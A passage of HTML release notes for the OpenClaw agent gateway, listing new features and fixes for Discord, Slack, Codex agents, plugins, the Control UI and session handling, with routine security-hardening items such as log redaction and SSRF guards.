<p>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</p>
</li>
<li>
<p>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</p>
</li>
<li>
<p>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Dependencies: refresh bundled runtime and plugin dependency pins, including Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</p>
</li>
<li>
<p>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</p>
</li>
<li>
<p>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</p>
</li>
<li>
<p>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</p>
</li>
<li>
<p>Slack: publish a safe default App Home tab view on <code>app_home_opened</code> and include the Home tab event in setup manifests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Slack: keep track of bot-participated threads across restarts, so ongoing threaded conversations can continue auto-replying after the Gateway is restarted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</p>
</li>
<li>
<p>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</p>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</p>
</li>
<li>
<p>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</p>
</li>
<li>
<p>Gateway/CLI: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting.</p>
</li>
<li>
<p>Updates/plugins: keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, avoiding stale WebChat runtime chunks and old Twitch packages after upgrading from 2026.4.29.</p>
</li>
<li>
<p>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</p>
</li>
<li>
<p>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: use the ClawHub artifact resolver response as the install decision before downloading, keeping legacy ZIP fallback and future ClawPack npm-pack installs on the same explicit resolver path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/source checkout: discover source-only plugins such as Codex from the <code>extensions/*</code> workspace while using npm package excludes as the packaged-core boundary, removing the stale core-bundle metadata path.</p>
</li>
<li>
<p>Plugins/ClawHub: install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path and persist artifact kind, npm integrity, shasum, and tarball metadata for update and diagnostics flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI: allow deployments to configure grouped chat message max-width with a validated <code>gateway.controlUi.chatMessageMaxWidth</code> setting instead of patching bundled CSS after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a>.</p>
</li>
<li>
<p>Control UI/Cron: ignore malformed persisted cron rows without valid payloads before they enter UI state and guard stale cron render paths, preventing blank Control UI sections after a bad cron snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>.</p>
</li>
<li>
<p>Control UI/sessions: bound the default Sessions tab query to recent activity and fewer rows, avoiding expensive full-history loads while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</p>
</li>
<li>
<p>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</p>
</li>
<li>
<p>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</p>
</li>
<li>
<p>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings and keep Stop available after reconnect or reload by recovering session-scoped active-run abort state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</p>
</li>
<li>
<p>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</p>
</li>
<li>
<p>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, installing actively used downloadable OpenClaw plugins through the configured external source before marking the config touched for the release.</p>
</li>
<li>
<p>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</p>
</li>
<li>
<p>Control UI: contain the standalone iOS PWA viewport with safe-area-aware document locking, so Add-to-Home-Screen launches cannot scroll past the device bounds. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368888109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76072/hovercard" href="https://github.com/openclaw/openclaw/pull/76072">#76072</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>.</p>
</li>
<li>
<p>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</p>
</li>
<li>
<p>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</p>
</li>
<li>
<p>Control UI/WebChat: use high-contrast text selection colors so highlighted chat text stays visible across themes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>.</p>
</li>
<li>
<p>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</p>
</li>
<li>
<p>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</p>
</li>
<li>
